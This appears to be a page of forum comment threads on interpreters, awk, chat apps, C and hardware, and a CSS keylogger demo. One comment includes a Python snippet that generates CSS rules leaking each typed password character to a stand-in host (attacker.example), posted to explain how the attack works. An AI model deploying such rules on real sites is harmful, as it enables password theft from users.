1.  

    Another example that might not completely count: Mono re-added its interpreter; while it does have a JIT/AOT mode it primarily uses, the interpreter is useful in contexts like reflection on restrictive platforms (cough, iOS), or in cases where compiler latency makes something slower than just interpreting the IL.

    1. 11

      Awk and the various members of the Unix shell family?

      1. 6

        Yup, I’ve looked at 5-10 shell implementations, and all of them are essentially AST interpreters + on-the-fly parsing/evaluating.

        Just like Ruby was an AST interpreter that recently became a bytecode interpreter, R made the same jump recently:

        A byte code compiler for R

        https://scholar.google.com/scholar?cluster=1975856130321003102&hl=en&as_sdt=0,5&sciodt=0,5
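
        For anyone who hasn’t seen the distinction, here’s a toy sketch of the jump from AST-walking to bytecode (in Python, purely illustrative; real shells/Ruby/R are vastly more involved):

        # AST interpreter: re-walk the tree on every evaluation.
        def eval_ast(node):
            op, *args = node
            if op == "lit":
                return args[0]
            a, b = eval_ast(args[0]), eval_ast(args[1])
            return a + b if op == "add" else a * b

        # Bytecode interpreter: compile the tree once to a flat
        # instruction list, then run a simple stack-machine loop.
        def compile_expr(node):
            op, *args = node
            if op == "lit":
                return [("push", args[0])]
            return compile_expr(args[0]) + compile_expr(args[1]) + [(op,)]

        def run(code):
            stack = []
            for ins in code:
                if ins[0] == "push":
                    stack.append(ins[1])
                else:
                    b, a = stack.pop(), stack.pop()
                    stack.append(a + b if ins[0] == "add" else a * b)
            return stack[0]

        expr = ("add", ("lit", 2), ("mul", ("lit", 3), ("lit", 4)))
        print(eval_ast(expr), run(compile_expr(expr)))   # 14 14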

        1. 1

          Do you happen to know how recently they’ve switched? (And an example of a large project written purely (or almost purely) in that language?) Thanks.

          1. 5

            Ruby switched in 2007. I used it for a few years before that, and the speedups were quite dramatic. See https://en.wikipedia.org/wiki/YARV for a bit more info.

            1.  

              Cool! That links to some benchmarks, which saves me from trying to do them myself.

              Looks like it’s only about 4x on average, which is hopeful (for having no bytecode).

            2.  

              It looks like it was around R releases 2.13 and 2.14, which was around 2011. R is from the early/mid 90’s, similar to Ruby, and I think they both switched to bytecode compilers at around the same time.

              https://csgillespie.github.io/efficientR/7-4-the-byte-compiler.html

              https://cran.r-project.org/src/base/R-2/

              R is for data analysis, so it’s hard to say what a “large project” is. It’s also a wrapper around Fortran numeric libraries in the same way Python is a wrapper around C (or NumPy is a wrapper around Fortran.)

              There are thousands of libraries written in R:

              https://cran.r-project.org/web/packages/available_packages_by_date.html

              1.  

                Thanks! This actually looks like a pretty good example. That website even lists package dependencies so I can try to find a long chain of pre-2011 dependencies.

          2. 4

            Unix shell, for sure. GNU awk and mawk compile to bytecode. Not sure about nawk, though the regexp implementation in nawk uses bytecode.

            1.  

              GNU awk and mawk compile to bytecode

              Really? That seems weird, since gawk is slower than both nawk and mawk. Or is it because of the features the GNU project added that it’s overall slower?

              1. 6

                One big difference is that gawk operates on sequences of Unicode characters, while mawk and nawk operate on sequences of bytes. If your text is all ASCII, setting your locale to ‘C’ will cause gawk to also operate on bytes, which should close at least some of the performance gap. But gawk’s Unicode support can be nice if you have UTF-8. mawk and nawk will often still produce the right result on UTF-8 input, especially when non-ASCII characters are only passed through unmodified. But sometimes you get:

                $ echo $LANG
                en_GB.UTF-8
                $ echo "ÜNICÖDE" | gawk '{print tolower($0)}'
                ünicöde
                $ echo "ÜNICÖDE" | nawk '{print tolower($0)}'
                �nic�de
                $ echo "ÜNICÖDE" | mawk '{print tolower($0)}'
                �nic�de
                
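                A rough Python sketch of the mechanism (not awk’s actual code): case-mapping characters handles multi-byte UTF-8 fine, while case-mapping individual bytes against a single-byte (Latin-1-style) table corrupts the sequences, which is presumably where the � come from:

                s = "ÜNICÖDE"
                print(s.lower())                   # ünicöde (character-oriented, like gawk)

                raw = s.encode("utf-8")            # b'\xc3\x9cNIC\xc3\x96DE'
                # Byte-oriented tolower: 0xC3 looks like uppercase 'Ã' in
                # Latin-1, so it gets "lowered" to 0xE3, destroying the
                # multi-byte sequence.
                lowered = bytes(b + 0x20 if (0x41 <= b <= 0x5A or 0xC0 <= b <= 0xDE) else b
                                for b in raw)
                print(lowered.decode("utf-8", errors="replace"))   # �nic�de
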
            2. 1

              Thanks for the example. I don’t know how they work internally, although to me they’re in the write-more-primitives-in-a-faster-language category, the primitives being the external commands they call (maybe awk a bit less?).

              Are there examples of multi-layered library (or use) for awk and shell?

              Edit: typo

              1. 2

                What does “multi-layered push” mean?

                As for awk, when I use it, I never shell out. If I need to shell out from awk, I just write the whole thing in Go or something. So I just use the primitives exposed by awk. Though, before Go, I shelled out of awk more often.

                1. 1

                  multi-layered push

                  Oops, that’s the wrong words. That’s what I get for alt-tabbing between the comment window and a shell.

                  I mean something like calling a library which calls another library which calls another library, with all intermediate libraries written in awk (or shell). (Or the same thing with functions, if they are layered one on top of another. By this I mean functions in one layer treat functions in the previous layer as primitives.)

                  As for awk, when I use it, I never shell out.

                  That would be a good example then if you also have at least two layers of functions (although more would be nice).

            1. 1

              There’s a lot of browser-specific setup and a whole nodejs server included in this. I would not qualify this as “pure” CSS keylogging. Neat stuff though!

              1. 2

                The actual keylogging is done inside the CSS; you’d still need something to exfiltrate it with.

                1. 2

                  No it isn’t, it relies on JavaScript to update the DOM, which is read by the CSS. This is a JavaScript keylogger that uses CSS and the DOM for exfiltration, when it could just as easily use XMLHttpRequest.
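
                  To make that concrete: the CSS part is just a pile of attribute-selector rules, one per character, like this sketch generates (hostname made up). Note it matches the value attribute, which is exactly why JS has to mirror the typed value into the DOM:

                  # Generate the attribute-selector rules this kind of attack
                  # relies on: each rule fires one request when the input's
                  # value *attribute* ends with a given character. CSS does the
                  # exfiltration; JS (e.g. React) must keep the attribute in
                  # sync with keystrokes. Hostname is made up.
                  charset = "abcdefghijklmnopqrstuvwxyz0123456789"
                  print("\n".join(
                      f'input[type="password"][value$="{c}"] '
                      f'{{ background-image: url("https://attacker.example/k/{c}"); }}'
                      for c in charset
                  ))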

                  1. 2

                    It works if you can get style injection on a site that’s already using JS to update the .value, though (e.g. React).

                    1. 1

                      I think, in that situation, React is the keylogger.

                      1. 1

                        Sure - but it’s a pretty widely installed one.

              1. 5

                So true:

                They [Google] released sample implementations under open source licenses, encouraged others to run their own Wave servers independent of Google infrastructure, and defined a federation protocol (on top of Jabber/XMPP) so that people on different servers could still talk with each other.

                This seems weird, a decade later, when Google and Facebook are each trying to get everyone into their walled gardens so they can serve ads to you.

                1. 5

                  Back then, Facebook and Google were using XMPP for their IM services - now look at the mess we have…

                  1. 1

                    I liked that you did not need a Facebook or Google account to speak with their victims. :(

                    1. 1

                      Well, Facebook didn’t federate.

                  1. 2

                    Seems like a new p2p messaging app pops up every year. I wish you luck, but I can’t see it even passing Tox, which is fairly unusable.

                    1. 25

                      Agreed, but it’s fun to work on.

                      1. 23

                        THIS is the mentality I admire. Every time I come up with a new project and want to show it off, I’m inundated with “yeah, but X already exists! Why would you make another one?” Because it’s fun! Because I want my own! Because I want to write code!

                        Keep it up, it’s a cool project.

                        1. 12

                          Thank you! Having my own project like this to refactor and perfect allows me to stay sane in the business-focused “it ain’t broke” environment of the real world.

                        2. 8

                          I love this mentality and that’s why I wrote my own p2p chat app too.

                          The most fun part was learning how to punch through firewalls, building messaging on top of UDP, and encryption.
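
                          If anyone wants the flavor of the hole-punching part, here’s a toy sketch (Python for brevity; in reality a rendezvous server tells each peer the other’s public ip:port, which is made up here):

                          # Toy UDP hole punch: both peers run this against each
                          # other's public address, e.g. chat(5000, "203.0.113.7", 5000).
                          import socket, threading, time

                          def chat(local_port, peer_ip, peer_port):
                              sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                              sock.bind(("0.0.0.0", local_port))
                              peer = (peer_ip, peer_port)

                              def keep_punching():
                                  # Outbound packets make our NAT create (and keep
                                  # alive) a mapping toward the peer; once both
                                  # sides send, traffic flows in both directions.
                                  while True:
                                      sock.sendto(b"\x00", peer)
                                      time.sleep(2)
                              threading.Thread(target=keep_punching, daemon=True).start()

                              while True:
                                  data, addr = sock.recvfrom(2048)
                                  if addr == peer and data != b"\x00":
                                      print("peer:", data.decode(errors="replace"))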

                          Learning is best done through doing.

                          Question: what encryption does your chat app use?

                          1. 3

                            None whatsoever 🙊. All messages are transmitted in the clear right now, to obvious peril. Another goal I’d like to hit is implementing end-to-end encryption. I’m interested in using libsignal, but don’t know enough about it to know if it’s applicable to a p2p protocol like this.

                            1. 2

                              I’d like to see yours too if you want to share.

                              1. 1

                                I haven’t worked on it in like a year, though I recently started doing some C++17 revamp. It’s called Fire★. It’s interesting that you chose GTK; any reason to pick that over something like Qt?

                                1. 1

                                  None other than that the Rust bindings looked mature and are easy enough to work with. I actually started by wrapping it with Swift and making an iOS app. I made some progress but it was pretty hard to maintain the Swift wrapper, wrapping a C interface, wrapping the actual library.

                                  Fire(star) looks pretty cool. Next time I have some free time with my laptop I want to play around with it.

                                  1. 2

                                    Interesting, hopefully the Rust people will get decent Qt bindings. Qt is pretty damn great. If you ever do play with Firestr, PM me your ID and I’ll send you mine.

                          2. 3

                            What’s wrong with Tox?

                            1. 3

                              Nothing that I know of.

                              1. 2

                                Last I saw, which was a little while ago, it didn’t work well at all on mobile, because you need a constant connection to the network, which drains your battery and data real fast. Matrix looks a lot more promising for real use.

                                1. 1

                                  does matrix have video chat?

                                  1. 1

                                    It does. It has almost all the features of things like discord and slack but they need to be polished more and sped up.

                                2. 1

                                  Doesn’t Tox have developer drama every so often?

                                3. 1

                                  Can you clarify what Tox is and, more importantly, why you think it wouldn’t pass?

                                  I think you mean “be better than Tox [another messaging system], which has its own usability problems”.

                                  1. 2

                                    Tox is another P2P messaging system. The Qt client is a little wonky, and I remember having issues when trying to do group chat. Beyond that, it was really nice to use, and the voice chat functionality was surprisingly great. The last time I used Tox was maybe 2014 so maybe it’s changed since then. I think the main thing Tox has going for it ahead of other P2P systems is that it’s relatively popular and well-known.

                                1. 3

                                  I mean, if you’re running as a native app, you could at least run faster mining code than in JavaScript.

                                  1. 1

                                    Yeah but the JS code is already written. I don’t think these people are out there improving their programming chops.

                                  1. 22

                                      This article is great except for No. 3: learning how hardware works. C will teach you how PDP-11 hardware works, with some extensions, but not modern hardware. They have different models. The article then mentions that computer architecture and assembly are things they teach students. Those, plus online articles with examples on specific topics, will teach the hardware. So they’re already doing the right thing, even if maybe saying the wrong thing in No. 3.

                                      Maybe one other modification. There are quite a lot of tools, esp. reimplementations or clones, written in non-C languages. The trend started getting big with Java and .NET, with things like Rust and Go now making more waves. There’s also a tendency to write things in themselves. I bring it up because even the Python example isn’t true if you use a Python written in Python, one of the recent interpreter tutorials in Go, or something like that. You can benefit from understanding the implementation language and/or debugger of whatever you’re using in some situations. That’s not always C, though.

                                    1. 14

                                      Agreed. I’ll add that even C’s status as a lingua franca is largely due to the omnipresence of unix, unix-derived, and posix-influenced operating systems. That is, understanding C is still necessary to, for example, link non-ruby extensions to ruby code. That wouldn’t be the case if VMS had ended up dominant, or lisp machines.
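
                                        The same point shows up even from high-level languages today: talking to anything foreign almost always means going through the C ABI. A trivial Python illustration (POSIX systems):

                                        # Calling a C function from Python via ctypes: the C
                                        # calling convention is the shared ground, whatever
                                        # language either side is written in.
                                        import ctypes, ctypes.util

                                        libc = ctypes.CDLL(ctypes.util.find_library("c"))
                                        print(libc.strlen(b"hello"))   # 5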

                                        In that way, C is important to study for historical context. Personally, I’d try to find a series of exercises to demonstrate how different current computer architecture is from what C assumes, and use that as a jumping-off point to discuss how relevant C’s semantic model is today, and what tradeoffs were made. That could spin out either to designing a language which maps to today’s hardware more completely and correctly, or to discussions of modern optimizing compilers and how far abstracted a language can become and still compile to efficient code.

                                      A final note: no language “helps you think like a computer”. Our rich history shows that we teach computers how to think, and there’s remarkable flexibility there. Even at the low levels of memory, we’ve seen binary, ternary, binary-coded-decimal, and I’m sure other approaches, all within the first couple decades of computers’ existence. Phrasing it as the original author did implies a limited understanding of what computers can do.

                                      1. 8

                                        C will teach you how PDP-11 hardware works with some extensions, but not modern hardware. They have different models.

                                          I keep hearing this meme, but PDP-11 hardware is similar enough to modern hardware in every way that C exposes - except, arguably, NUMA and inter-processor effects.

                                        1. 10

                                            You just countered it yourself with that, given the prevalence of multicores and multiprocessors. Then there’s cache hierarchies, SIMD, maybe alignment differences (my memory is fuzzy), effects of security features, and so on.

                                            They’d be better off just reading about modern computer hardware and ways of using it properly.

                                          1. 6

                                              Given that none of these are represented directly in assembly, would you also say that the assembly model is a poor fit for modeling modern hardware?

                                            I mean, it’s a good argument to make, but the attempts to make assembly model the hardware more closely seem to be vaporware so far.

                                            1. 6

                                                Hmm. They’re represented more directly than with C, given there’s no translation to be done to the ISA. Some, like SIMD, atomics, etc., will be actual instructions on specific architectures. So, I’d say learning hardware and ASM is still better than learning C if you want to know what the resulting ASM is doing on that hardware. I’m leaning toward yes.

                                                There is some discrepancy between assembly and hardware on highly-complex architectures, though. The RISCs and microcontrollers have less of it.

                                          2. 1

                                            Not helped by the C/Unix paradigm switching us from “feature-rich interconnected systems” like in the 1960s to “fast, dumb, and cheap” CPUs of today.

                                          3. 2

                                            I really don’t see how C is supposed to teach me how PDP-11 hardware works. C is my primary programming language and I have nearly no knowledge about PDP-11, so I don’t see what you mean. The way I see it is that the C standard is just a contract between language implementors and language users; it has no assumptions about the hardware. The C abstract machine is sufficiently abstract to implement it as a software-level interpreter.

                                            1. 1

                                                As in this video of its history, the C language was designed specifically for the hardware it ran on, due to that hardware’s extremely limited resources. It was based heavily on BCPL, which invented “programmer is in control” and kept whatever features of ALGOL could compile on another limited machine, the EDSAC. Even being byte-oriented versus word-oriented was due to the PDP-7 being byte-oriented versus the EDSAC, which was word-oriented. After a lot of software was written in it, two things happened:

                                                (a) Specific hardware implementations tried to be compatible with it in stack or memory models, so that programs written for C’s abstract machine would go fast. Although possibly good for PDP-11 hardware, this compatibility meant many missed opportunities for both safety/security and optimization as hardware improved. These things, though, are what you might learn about hardware by studying C.

                                                (b) Hardware vendors competing with each other on performance, concurrency, energy usage, and security both extended their architectures and made them more heterogeneous than before. The C model didn’t just diverge from these: new languages were invented (esp. in HPC) so programmers could easily use them via something that gives a mental model closer to what the hardware does. The default was hand-coded assembly that got called in C or Fortran apps, though. Yes, HPC often used Fortran, since its model gave better performance than C’s on numerical applications, even on hardware designed for C’s abstract machine. Even though it was easy on the hardware, the C model introduced too much uncertainty about programmers’ intent for compilers to optimize those routines.

                                              For this reason, it’s better to just study hardware to learn hardware. Plus, the various languages either designed for max use of that hardware or that the hardware itself is designed for. C language is an option for the latter.

                                                “it has no assumptions about the hardware”

                                                It assumes the hardware will give people direct control over pointers and memory, in ways that can break programs. Recent work tries to fix the damage that came from keeping the PDP-11 model all this time. There were also languages that handled them safely by default unless told otherwise, using overflow or bounds checks. SPARK eliminated them for most of its code, with the compiler substituting pointers in where it’s safe to do so. It’s also harder in general to make C programs enforce POLA with hardware or OS mechanisms, versus a language that generates that for you or has true macros to hide the boilerplate.

                                                “The C abstract machine is sufficiently abstract to implement it as a software-level interpreter.”

                                              You can implement any piece of hardware as a software-level interpreter. It’s just slower. Simulation is also a standard part of hardware development. I don’t think whether it can be interpreted matters. Question is: how much does it match what people are doing with hardware vs just studying hardware, assembly for that hardware, or other languages designed for that hardware?

                                              1. 3

                                                  I admit that the history of C, and also the history of implementations of C, give some insight into computers and how they’ve evolved into what we have now. I do agree that hardware, operating systems, and the language have all been evolving at the same time and have made an impact on each other. That’s not what I’m disagreeing with.

                                                I don’t see a hint of proof that knowledge about the C programming language (as defined by its current standard) gives you any knowledge about any kind of hardware. In other words, I don’t believe you can learn anything practical about hardware just from learning C.

                                                  To extend what I’ve already said, the C abstract machine is sufficiently abstract to implement it as a software interpreter, and that matters, since it proves that C draws clear boundaries between expected behavior and implementation details, which include how a certain piece of hardware might behave. It does impose constraints on all compliant implementations, but that tells you nothing about what “runs under the hood” when you run things on your computer; an implementation might be a typical, bare-bones PC, or a simulated piece of hardware, or a human brain. So the fact that one can simulate hardware is not relevant to the fact that you still can’t draw practical conclusions about its behavior just from knowing C. The C abstract machine is neither hardware nor software.

                                                Question is: how much does it match what people are doing with hardware vs just studying hardware, assembly for that hardware, or other languages designed for that hardware?

                                                What people do with hardware is directly related to knowledge about that particular piece of hardware, the language implementation they’re using, and so on. That doesn’t prove that C helps you understand that or any other piece of hardware. For example, people do study assembly generated by their gcc running on Linux to think about what their Intel CPU will do, but that kind of knowledge doesn’t come from knowing C - it comes from observing and analyzing behavior of that particular implementation directly and behavior of that particular piece of hardware indirectly (since modern compilers have to have knowledge about it, to some extent). The most you can do is try and determine whether the generated code is in accordance with the chosen standard.

                                                1. 1

                                                    In that case, it seems we mostly agree about its connection to learning hardware. Thanks for elaborating.

                                          1. 5

                                            Coming from the DM, I had a hard time finding the gofundme link. Just in case others are as dense as I am, here it is: https://www.gofundme.com/lobsters-emoji-adoption

                                            1. 2

                                              It took me a moment to realize the link is the story link for this story. I’m just not used to seeing the announce tag on a link!

                                              1. 2

                                                Or on a primarily text post!

                                            1. 4

                                              -performance because she isn’t benchmarking code, but people!

                                              1. 1

                                                You’re right. Thank you!

                                              1. 5

                                                Siracusa, in articles like About the Finder… (and I believe Gruber too), has written about the reasons why the Mac OS X Finder is inferior to its classic Mac predecessor, if you’d like some grounding.

                                                1. 4

                                                  So many layers of complex technology, created only to circumvent Apple’s political restrictions. Why do they still ban JITs and GCs in 2018? And this is on the “devices of the future” intended to “replace desktop computers”.

                                                  1. 4

                                                    Because technically, JITs are very easy to exploit; and politically, they make it easy to build parallel ecosystems.

                                                  1. 10

                                                    Yeah, it did. And that’s unfortunate, because the ability to interact with a remote computer graphically as easily as you can with ssh would have been very useful. “Most people only ever interact with remote machines with either text mode SSH or a browser talking to a web server on the remote machine.” says the article, and indeed a web browser talking to a server on the remote machine is basically how one interacts with a remote computer graphically nowadays. This is wildly popular, of course, but is it the best possible world? Probably not.

                                                    1. 5

                                                      If you want to do that, RDP is actually well implemented and works for such purposes, on the Windows side.

                                                      1. 6

                                                        Unfortunately, there are a lot of “RDP hostile” applications these days – many of them from Microsoft themselves! For example, using Skype for text chat over RDP is quite painful now.

                                                        1. 1

                                                          Not only on the Windows side. FreeRDP is very good too.

                                                      1. 9

                                                        My Mono patchset is likely getting merged upstream. So far I can run things like ASP.NET and old IRC bots of mine, but on weird IBM midrange systems.

                                                        1. 11

                                                          I think I would have preferred the source code…

                                                          1. 3

                                                            I could go either way on this. On the one hand, our intellectual property laws are horrible, and the game is 20 yrs old, so who cares?

                                                            But, on the other, I’d be pissed if I lost my camera and someone decided to dump the contents on imgur.

                                                            I think the reason there is any debate around this is that the owner is a giant and successful game corporation, which seemingly has nothing to lose from sharing the source. But if that were actually true, why wouldn’t they share it on their own terms?

                                                            1. 9

                                                              Many game publishers would rather have their game rot into obscurity and make no profits than share the code. Abandonware is so common these days. I think it’s mostly rooted in a bad theoretical perspective of how the software market works.

                                                              1. 2

                                                                According to an IP lawyer friend of mine, software companies are often afraid that if their source gets out it will more likely be discovered that they accidentally infringed someone else’s IP in ways they weren’t even aware of.

                                                                1. 1

                                                                  This is the reason for most of the NDAs in the hardware industry. It’s a patent minefield. Any FOSS hardware might get taken down. I don’t know as much about the software industry, except that big players like Microsoft and Oracle patent everything they can. A quick Google looking for video game examples got me this article. Claims included in-game directions, the d-pad, and unlocking secrets, but I haven’t vetted the article’s claims by reading the patents or anything.

                                                                2. 1

                                                                  Many game publishers would rather have their game rot into obscurity and make no profits than share the code.

                                                                  I think it comes down to one thing, actually: do you believe in the betterment of society (sharing), or do you believe in maximizing profits (greed)? In the last 20 years, we’ve seen this go from strictly black and white to a full color spectrum. Blizzard, even Microsoft, are somewhere in the middle, but neither of them has shared much of their core, profit-producing products.

                                                                  I think it’s mostly rooted in a bad theoretical perspective of how the software market works.

                                                                  Can you clarify a bit? I think what you’re saying might be similar to what I’m thinking… that the media industries have not yet adapted from “copies” sold as a metric of success, despite tons of evidence and anecdotes suggesting other ways to success.

                                                                  1. 1

                                                                    We’re saying the same thing yes. It’s hard for businesses to realize that price discrimination can go down to $0 and you can still make a hearty profit.

                                                                3. 1

                                                                  I bet there’s a lot of code in there that’s still heavily used in their games today, so probably not accurate to say they have nothing to lose.

                                                                  1. 1

                                                                    One would imagine! Though, the engines of 1998 vs. the engines of 2018 have probably changed quite significantly.

                                                              1. 2

                                                                I thought some of you might have never heard of this concept. Here’s the PCI version I’m really focusing on. I thought it better to submit where it started, then add that. The problem was that UNIX workstations, thought to be better in many ways, couldn’t run the PC software people were getting locked into. Instead of regular virtualization, Sun had the clever idea to straight-up put PC hardware in their UNIX boxes to run MS-DOS and then, I think, Windows apps. Early PS3’s did something similar, keeping a PS2 Emotion Engine in them for emulation. I can’t recall others off the top of my head, though.

                                                                The reason I’m posting this is that we’re currently trying to escape x86 hardware in favor of RISC-V and other stuff. My previous solution was two boxes in one chassis with a KVM switch. That might be too much for some users. I figured this submission might give people ideas about using modern card computers… which have usable specs… with FOSS workstations to run the legacy apps off the cards. The FOSS SoC, esp. its IOMMU, might isolate them in shared RAM from the rest of the system. It would also run apps from the shared hard drive in a way that was mediated. There should also be software that can seamlessly move things into or out of the system, but with the trusted part running on the FOSS SoC. It could even be a hardware component managed by trusted software, if wanting a speed boost and a possible reduction in attack surface.

                                                                1. 3

                                                                  I think you might be misreading - the 386 in the Sun386i is the only CPU - there’s no SPARC, it runs an x86 Solaris with DOS VDMs provided by V86 mode on the 386.

                                                                  PC-on-cards were somewhat popular with Macs before software emulation in the late 90s got good enough.

                                                                  1. 1

                                                                    To be extra clear, this is what my comment is about. It’s a PCI card that runs x86 software alongside Solaris/SPARC. I found the other one searching for it. If they’re unrelated, then my bad, thanks for the tip, and let’s explore the PCI card concept for x86 and RISC-V.

                                                                  2. 1

                                                                    There should also be software that can seamlessly move things into or out of the system, but with the trusted part running on the FOSS SoC.

                                                                    I know it is proprietary, but wouldn’t the Apple T1 in the MacBook Pro Retina and T2 in the iMac Pro be good examples as well?

                                                                    https://en.wikipedia.org/wiki/Apple-designed_processors#Apple_T1

                                                                    tl;dr: T1/T2 is a separate ARM SoC that acts as a secure enclave and is a gatekeeper for the mic and Facetime camera.

                                                                  1. 1

                                                                    Is this a press release or a “please come work here” post?

                                                                    Also, what is Matrix and what does it do?

                                                                    1. 2

                                                                        Basically IRC or XMPP (federated chat), but with JSON.
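
                                                                        To make that concrete, here’s a sketch of sending a message via the r0 client-server API (homeserver, room ID, and token are all made up): one authenticated HTTP PUT of a JSON event.

                                                                        # Sending a Matrix message is a single JSON PUT.
                                                                        import json, urllib.request
                                                                        from urllib.parse import quote

                                                                        hs = "https://matrix.example.org"   # made-up homeserver
                                                                        room = "!abc123:example.org"        # made-up room id
                                                                        token = "ACCESS_TOKEN"              # made-up token

                                                                        url = (f"{hs}/_matrix/client/r0/rooms/{quote(room, safe='')}"
                                                                               f"/send/m.room.message/txn1")
                                                                        req = urllib.request.Request(
                                                                            url,
                                                                            data=json.dumps({"msgtype": "m.text", "body": "hello"}).encode(),
                                                                            method="PUT",
                                                                            headers={"Authorization": f"Bearer {token}",
                                                                                     "Content-Type": "application/json"})
                                                                        print(urllib.request.urlopen(req).read())   # -> {"event_id": "$..."}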

                                                                    1. 2

                                                                      This seems like spam to me?

                                                                        They’ve copy-pasted the advisory and put a very stupid title on it. “Ugly, perfect ten-rated bug”, “patch before they’re utterly p0wned”, “btw it’s a denial of service attack”.

                                                                      No thanks.

                                                                      1. 2

                                                                          It’s The Register, the self-admitted British tabloid (like the Daily Mail) of the IT world. Sometimes they can produce a good article; other times it’s clickbait where you’re also expecting page 3 to be a naked woman.

                                                                        1. 1

                                                                          This vulnerability can “allow the attacker to execute arbitrary code and obtain full control of the system,” so it’s not just a DoS.

                                                                          https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1

                                                                        1. 12

                                                                          I’d prefer it if there was no design. Just the content.

                                                                          1. 16

                                                                            Which you get with a (full) RSS feed.

                                                                            1. 7

                                                                              Yup!

                                                                               Take care if you use Hugo: the default RSS template does not render the full article.

                                                                              Here’s a modified one that renders the full article in the feed:

                                                                              <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
                                                                                <channel>
                                                                                  <title>{{ .Title }}</title>
                                                                                  <link>{{ .Permalink }}</link>
                                                                                  <description>Recent posts</description>
                                                                                  <generator>Hugo -- gohugo.io</generator>{{ with .Site.LanguageCode }}
                                                                                  <language>{{.}}</language>{{end}}{{ with .Site.Author.email }}
                                                                                  <managingEditor>{{.}}{{ with $.Site.Author.name }} ({{.}}){{end}}</managingEditor>{{end}}{{ with .Site.Author.email }}
                                                                                  <webMaster>{{.}}{{ with $.Site.Author.name }} ({{.}}){{end}}</webMaster>{{end}}{{ with .Site.Copyright }}
                                                                                  <copyright>{{.}}</copyright>{{end}}{{ if not .Date.IsZero }}
                                                                                  <lastBuildDate>{{ .Date.Format "Mon, 02 Jan 2006 15:04:05 -0700" | safeHTML }}</lastBuildDate>{{ end }}
                                                                                  {{ with .OutputFormats.Get "RSS" }}
                                                                                      {{ printf "<atom:link href=%q rel=\"self\" type=%q />" .Permalink .MediaType | safeHTML }}
                                                                                  {{ end }}
                                                                                  {{ range .Data.Pages }}
                                                                                  <item>
                                                                                    <title>{{ .Title }}</title>
                                                                                    <link>{{ .Permalink }}</link>
                                                                                    <pubDate>{{ .Date.Format "Mon, 02 Jan 2006 15:04:05 -0700" | safeHTML }}</pubDate>
                                                                                    {{ with .Site.Author.email }}<author>{{.}}{{ with $.Site.Author.name }} ({{.}}){{end}}</author>{{end}}
                                                                                    <guid>{{ .Permalink }}</guid>
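                                                                                    {{/* changed from the stock template, which uses .Summary here; .Content gives the full post */}}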
                                                                                    <description>{{ .Content | html }}</description>
                                                                                  </item>
                                                                                  {{ end }}
                                                                                </channel>
                                                                              </rss>
                                                                              

                                                                              I probably should have included that in the article… Too late now.

                                                                              1. 3

                                                                                Why is it too late now?

                                                                                1. 5

                                                                                  I was about to answer laziness and realized this is not something that should be celebrated.

                                                                                  It’s now included.

                                                                                  1. 1

                                                                                    Thank you for adding it, it will be handy for me when I go back to your post in a few weeks and look for how to do this. :)

                                                                              2. 1

                                                                                Blogs should just be an XSLT transform applied to RSS ;)

                                                                              3. 2

                                                                                 The built-in Firefox Reader mode is a godsend. I feel much more comfortable reading long texts in the same font, page width, and background color, plus the scrollbar on the right now gives me a pretty good estimate of reading time.

                                                                                1. 1

                                                                                  Weirdly, though, that all comes down to the good design of Firefox reader mode :D.

                                                                                2. 1

                                                                                 RSS, lightweight versions (light.medium.com/usual/url?), heck even gopher, do the job perfectly! We need these things.

                                                                                1. 1

                                                                                   Working on porting some software to PASE - I’m doing pretty well for someone who’s never used AIX before and has no knowledge of POWER assembler; just applying my knowledge of hacking around old commercial Unix, plus codebase familiarity. We’re a lot further in than we thought we’d be! The big problem is the toolchain, where the readymade ones kinda suck, so we’re tempted to build one ourselves. (The problem there is, GCC is a monster to build and may assume some things that don’t exist. LLVM doesn’t seem much better, if it’s even compatible at all.)